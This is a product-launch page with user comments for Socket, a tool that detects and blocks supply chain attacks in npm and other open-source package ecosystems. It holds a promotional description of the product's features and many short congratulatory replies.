Socket - Secure your JavaScript supply chain

Love to see it!

🤩 Exciting news! I'm ready to share the project I've been working on for the past 7 months! ✨ ⭐️ Socket – Secure your JavaScript supply chain ⭐️ We are a team of open source maintainers with over ✨ 1 billion monthly downloads ✨ to our names. Working on the frontlines of open source, we have witnessed firsthand how supply chain attacks have swept across our communities and damaged trust in open source. From npm to PyPI, and Rubygems to Cargo, no ecosystem has been spared. 🔥🔥🔥 Over the past decade, open source software has eaten the world. Sharing code freely has made it drastically cheaper and faster to build software – and tech innovation has accelerated as a result. But security has often been an afterthought. New technology spreads because it's useful, not because it's safe. In 2021, we witnessed an 📈 unprecedented growth 📈 in the scale and scope of open source supply chain attacks. Criminals are taking advantage of the trust in open ecosystems to carry out brazen attacks and spread destructive malware. 💥 The attacks keep on coming and they seem to be accelerating. == What does Socket do? == We are taking an entirely new approach to one of the hardest problems in security in a stagnant part of the industry that has historically been obsessed with just reporting on known vulnerabilities. Socket is unique because, unlike other tools, it detects and blocks supply chain attacks before they strike, mitigating the worst consequences: ⚡️ Supply Chain Attack Prevention: Prevent compromised or hijacked packages from infiltrating your supply chain by monitoring dependency changes in real-time. ⚡️ Detect Suspicious Package Behavior: Detect when dependency updates introduce new usage of risky APIs such as network, shell, filesystem, etc. ⚡️ Comprehensive Protection: Block 60+ red flags in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more. Today, our early customers are using Socket to protect their apps from typo-sqatting attacks using. If you're interested in trying out Socket, you can install the GitHub App in less than 2 minutes. Feel free to reach out to us at contact@socket.dev as well if you'd like to chat and get a more in-depth demo. Read more in our launch post here: https://socket.dev/blog/introduc... Here's a much longer deep dive into the problem of supply chain security: https://socket.dev/blog/inside-n...

Building this has been a lot of fun, and it's already my favorite tool for browsing npm packages. It's great to see the exact published code in my browser with inline issues and links!

npm has long lacked a tool to introspect what is actually going on inside of your node_modules folder. It's been great to help build a tool that gives me the types of research and analysis tools that I always needed needed to understand my dependency tree, as well as offer up useful features that I always wish the npm website had itself. Happy to answer any questions and I'm really excited to see what you think of the direction Socket is headed in!

Love this team, love the product. Keep it up!

I'm excited to get v1 out! Already socket.dev is useful for exploring JavaScript dependencies, and it's only going to get better as we keep building out more features. But npm users beware! You may find some really gross things hiding in your node_modules folder once you start looking closely.

Impressed at @SocketSecurity launch. Their tool keeps your app safe even in the worst case scenario of an active supply chain attack in an NPM package.

Congrats on your launch! I will definitely check this!

Do I know what is in my node_modules? No I don't. And I don't have a change in hell to audit everything in there by hand. Looks like a super solid start on long needed tools to find where all the bodies are buried.

Detecting supply chain attacks by analyzing dependency behavior is such a refreshingly obvious idea once you see it in action.

Awesome product. Awesome customers. Awesome team. We've deployed Socket to our whole GitHub organization – love their product + take on supply chain security for us/the world!

Good job, upvote this!

We use Socket to protect the StandardJS GitHub organization.

Proud to launch Socket today ❤️❤️❤️

@jhiesey @bret_comnes Love the product.. great job!! congrats 👍🚀

Nice one.

Awesome, congrats!!

Great product. I'll like to see you add more useful features. I can't list what features, but I feel a sense of importance if you'll add more valuable features

This is insane, thanks for this @feross!

This is amazing!!